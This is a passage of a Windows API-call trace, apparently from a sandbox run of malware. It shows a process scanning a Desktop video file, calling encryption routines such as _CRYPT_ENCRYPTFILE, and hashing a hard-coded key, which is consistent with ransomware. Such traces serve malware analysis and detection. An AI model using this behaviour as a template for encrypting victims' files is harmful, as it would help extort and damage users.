HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nBTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BTD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TD\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yvZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZxV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xV2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VbG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bG06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="06XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XDhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DhaG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="haG1Z.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.322] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0075.322] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.322] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.322] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.mp4", lpFindFileData=0x61e870 | out: lpFindFileData=0x61e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaca41e0, ftCreationTime.dwHighDateTime=0x1d5e740, ftLastAccessTime.dwLowDateTime=0x9aebd660, ftLastAccessTime.dwHighDateTime=0x1d5e6d4, ftLastWriteTime.dwLowDateTime=0x9aebd660, ftLastWriteTime.dwHighDateTime=0x1d5e6d4, nFileSizeHigh=0x0, nFileSizeLow=0x1040, dwReserved0=0x61e9c0, dwReserved1=0x657690, cFileName="I_yvZxV2VbG06XDhaG1Z.mp4", cAlternateFileName="I_YVZX~1.MP4")) returned 0x6b89f8 [0075.323] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0075.323] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.323] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.323] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77710000 [0075.344] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0075.344] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.344] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.344] CryptAcquireContextA (in: phProv=0x61e550, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x61e550*=0x696ad0) returned 1 [0075.345] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0075.345] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.345] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0075.345] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.345] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.345] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.345] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.345] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.345] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.345] CryptCreateHash (in: hProv=0x696ad0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x61e2c0 | out: phHash=0x61e2c0) returned 1 [0075.345] CharLowerBuffW (in: lpsz="byte[22]", cchLength=0x8 | out: lpsz="byte[22]") returned 0x8 [0075.345] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0075.345] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.345] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.345] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.345] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.345] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.345] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da40 | out: hHeap=0x650000) returned 1 [0075.345] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b480 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MENQILbzGVCLiQeXEN72f1", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0075.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MENQILbzGVCLiQeXEN72f1", cchWideChar=23, lpMultiByteStr=0x6f9788, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MENQILbzGVCLiQeXEN72f1", lpUsedDefaultChar=0x0) returned 23 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9788 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9768 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b480 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9768 | out: hHeap=0x650000) returned 1 [0075.346] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.346] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ace8 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b4b0 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dcc0 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.347] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0075.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0075.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x76ac10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0075.348] GetProcAddress (hModule=0x77710000, lpProcName="CryptHashData") returned 0x7771df36 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb548 | out: hHeap=0x650000) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da40 | out: hHeap=0x650000) returned 1 [0075.348] CryptHashData (hHash=0x6b8b38, pbData=0x6f96c8, dwDataLen=0x16, dwFlags=0x1) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0075.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.349] HeapFree (in: 